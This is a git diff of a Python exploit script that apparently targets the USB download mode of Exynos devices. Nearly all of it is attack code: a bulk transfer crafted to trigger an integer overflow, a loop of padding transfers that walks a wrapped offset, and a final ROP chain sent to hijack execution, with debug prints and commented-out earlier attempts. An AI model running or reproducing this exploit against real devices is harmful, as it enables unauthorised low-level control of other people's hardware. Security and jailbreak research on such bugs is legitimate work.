diff --git a/exploit.py b/exploit.py index 5aa15f2..52c8579 100644 --- a/exploit.py +++ b/exploit.py @@ -90,37 +90,60 @@ class ExynosDevice(): def exploit(self, payload: bytes): current_offset = TARGET_OFFSETS[self.target][0] - transfered = 0 transferred = ctypes.c_int() - max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 + size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6 + max_payload_size = 0x100000000 - size_to_overflow + + # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1] + # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 payload = payload + ((max_payload_size - len(payload)) * b"\x00") assert len(payload) == max_payload_size, "Invalid payload" # First send payload to trigger the bug - bug_payload = p32(0) + p32(0xfdfde800) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) # dummy packet for triggering the bug + bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug + bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload)) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) assert res == 0, "Error triggering payload" - current_offset += len(bug_payload) + assert transferred.value == len(bug_payload), "Invalid transfered size" + current_offset += len(bug_payload) - 8 # Remove header # Send the actual payload - transfered = 0 - res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) - assert res == 0, "Error sending payload" + # res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) + # assert res == 0, "Error sending payload" + # current_offset += len(payload) - current_offset += len(payload) + cnt = 0 while True: - if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][2]: + if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]: break self.send_empty_transfer() + current_offset += CHUNK_SIZE + cnt += 1 + if current_offset > 0x100000000: + current_offset = current_offset - 0x100000000 #reset 32 byte integer + print(f"{cnt} {hex(current_offset)}") - rop_chain = p64(TARGET_OFFSETS[self.target][0]) * (8 // CHUNK_SIZE) + remaining = (TARGET_OFFSETS[self.target][1] - current_offset) + assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet" + if remaining > BLOCK_SIZE: + self.send_empty_transfer() + # Send last transfer, TODO who aligns this ROM?? + current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE) + cnt += 1 + print(f"{cnt} {hex(current_offset)}") + + rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2) + # p_offset = (TARGET_OFFSETS[self.target][1] - current_offset) + # rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0])) + # rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32 + # Should + transferred = ctypes.c_int(0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) + # assert transferred.value == len(rop_chain), "Error sending ROP chain" - - transfered = 0 - buf = ctypes.c_buffer(b"", 0x20000) - res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 10000) + buf = ctypes.c_buffer(b"", 0x200000) + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000) padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]